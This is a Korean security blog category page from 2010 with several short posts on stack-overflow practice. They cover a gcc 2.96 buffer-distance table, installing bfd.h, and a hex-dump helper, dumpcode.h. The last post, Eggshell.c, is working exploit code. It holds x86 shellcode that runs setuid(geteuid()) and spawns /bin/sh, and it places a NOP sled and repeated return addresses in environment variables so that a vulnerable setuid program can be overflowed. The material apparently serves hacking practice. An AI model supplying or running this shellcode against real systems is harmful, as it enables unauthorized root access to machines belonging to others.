글
gcc 2.96에서 buf와 buf2의 거리표
예전 hackerleon님꼐서 굉장히 수고하셔서 만드신 표입니다.
오늘 이거를 참고 안하고 운을 믿고 brute force하다가 화가 많이 날뻔했습니다.
-_-;
'IT/Security > System' 카테고리의 다른 글
| Ubuntu 10.04 Beta2 설치기 (0) | 2010.04.22 |
|---|---|
| /bin/sh 주소를 찾을 때 (0) | 2010.03.17 |
| bfd.h 가 없을 경우 (0) | 2010.03.14 |
| dumpcode.h (0) | 2010.03.14 |
| 에그쉘/Eggshell.c 코드 (0) | 2010.03.14 |
글
bfd.h 가 없을 경우
시스템 내에서 bfd.h가 없을 경우 다음을 따르시길 바랍니다.
apt-get을 사용하여 binutils-dev를 설치하시면 됩니다.
컴파일 시에는 gcc에서 -l 옵션을 붙여 bfd 를 참조하겠끔 하면 됩니다.
ex)
gcc -o test test.c -lbfd
(bfd.h 소스)
'IT/Security > System' 카테고리의 다른 글
| Ubuntu 10.04 Beta2 설치기 (0) | 2010.04.22 |
|---|---|
| /bin/sh 주소를 찾을 때 (0) | 2010.03.17 |
| gcc 2.96에서 buf와 buf2의 거리표 (0) | 2010.03.14 |
| dumpcode.h (0) | 2010.03.14 |
| 에그쉘/Eggshell.c 코드 (0) | 2010.03.14 |
글
dumpcode.h
void printchar(unsigned char c)
{
if(isprint(c))
printf("%c",c);
else
printf(".");
}
void dumpcode(unsigned char *buff, int len)
{
int i;
for(i=0;i<len;i++)
{
if(i%16==0)
printf("0x%08x ",&buff[i]);
printf("%02x ",buff[i]);
if(i%16-15==0)
{
int j;
printf(" ");
for(j=i-15;j<=i;j++)
printchar(buff[j]);
printf("\n");
}
}
if(i%16!=0)
{
int j;
int spaces=(len-i+16-i%16)*3+2;
for(j=0;j<spaces;j++)
printf(" ");
for(j=i-i%16;j<len;j++)
printchar(buff[j]);
}
printf("\n");
}
/*
ohhara 님께서 작성하신 dumpcode.h 입니다.
아마 쓰신다면 굉장히 유용하게 쓰일거라고 장담할 수 있습니다.. 본인도 유용히..;;
*/
'IT/Security > System' 카테고리의 다른 글
| Ubuntu 10.04 Beta2 설치기 (0) | 2010.04.22 |
|---|---|
| /bin/sh 주소를 찾을 때 (0) | 2010.03.17 |
| gcc 2.96에서 buf와 buf2의 거리표 (0) | 2010.03.14 |
| bfd.h 가 없을 경우 (0) | 2010.03.14 |
| 에그쉘/Eggshell.c 코드 (0) | 2010.03.14 |
글
에그쉘/Eggshell.c 코드
/* 이전에 포스팅했던 코드가 좀 엉망진창이라서 다시 포스팅 함 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 256
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" //setuid(geteuid())
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char **argv)
{
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if ( argc > 1 ) bsize = atoi(argv[1]);
if ( argc > 2 ) offset = atoi(argv[2]);
if ( argc > 3 ) eggsize = atoi(argv[3]);
if ( !(buff = malloc(bsize)))
{
printf("Can't allocate memory for bsize\n");
exit(0);
}
if ( !(egg = malloc(eggsize)))
{
printf("Can't allocate memory for eggsize");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *)ptr;
for(i = 0; i < bsize; i+= 4)
*(addr_ptr++) = addr;
ptr = egg;
for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for(i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg, "EGG=", 4);
putenv(egg);
memcpy(buff, "RET=", 4);
putenv(buff);
system("/bin/bash");
}
'IT/Security > System' 카테고리의 다른 글
| Ubuntu 10.04 Beta2 설치기 (0) | 2010.04.22 |
|---|---|
| /bin/sh 주소를 찾을 때 (0) | 2010.03.17 |
| gcc 2.96에서 buf와 buf2의 거리표 (0) | 2010.03.14 |
| bfd.h 가 없을 경우 (0) | 2010.03.14 |
| dumpcode.h (0) | 2010.03.14 |
